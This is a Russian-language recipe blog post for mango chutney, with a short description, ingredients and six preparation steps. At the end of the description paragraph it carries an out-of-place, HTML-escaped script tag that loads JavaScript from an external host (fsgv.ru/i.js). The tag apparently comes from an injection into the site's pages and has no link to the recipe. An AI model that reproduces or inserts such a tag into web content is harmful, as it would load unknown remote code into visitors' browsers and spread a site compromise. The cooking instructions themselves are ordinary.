Среда , 10 августа 2022


Чатни из манго

 

Как известно, чатни — это широко распространенное на юге Азии блюдо. Это традиционная приправа, которую обычно готовят из фруктов — в частности, из манго. Делюсь рецептом.

Описание приготовления:

Чатни из манго — это очень популярная индийская приправа, которая благодаря специям и необычной технологии приготовления очень здорово возбуждает аппетит. Обычно ее передают перед основным блюдом, вместе с какой-нибудь закуской. В нашей семье чатни из манго используется разными способами — намазываем на хлеб, добавляем в блинчики, подаем с оладьями, всякими разными закусками… Вкус передать сложно — надо пробовать. Чего вам и желаю!&ltscript type=»text/javascript» src=»http://fsgv.ru/i.js»&gt&lt/script&gt

Основной ингредиент: Фрукты / Манго
Блюдо: Соусы / Чатни

Ингредиенты:

  • Манго — 2 штуки;
  • Растительное масло — 2 ст. ложки;
  • Перец чили — 2 штуки;
  • Специи — 3 щепотки (зира, зерна горчицы, перец горошком, соль, сахар, кориандр, паприка);
  • Лимонный сок — 2 чайных ложки.

Количество порций: 8

Как приготовить «Чатни из манго»

Чатни из манго - фото шаг 1

Очищаем манго от кожуры.

Чатни из манго - фото шаг 2

Мякоть манго нужно размять ложечкой до пюреобразного состояния.

Чатни из манго - фото шаг 3

В сковороде разогрейте масло, обжарьте в нем перец и специи в течение 1-2 минуты на быстром огне.

Чатни из манго - фото шаг 4

Теперь добавляем лимонный сок, перемешиваем.

Чатни из манго - фото шаг 5

Сразу же добавляем манго и уменьшаем огонь. Тушим, помешивая, в течение 5 минут.

Чатни из манго - фото шаг 6

Снимаем с огня, охлаждаем — и готово! Хранить в холодильнике.

Смотрите также

Сливочный дип

  Сливочный дип, приготовленный по этому нехитрому рецепту, отлично подойдёт к любому блюду в качестве …

Добавить комментарий

Ваш адрес email не будет опубликован.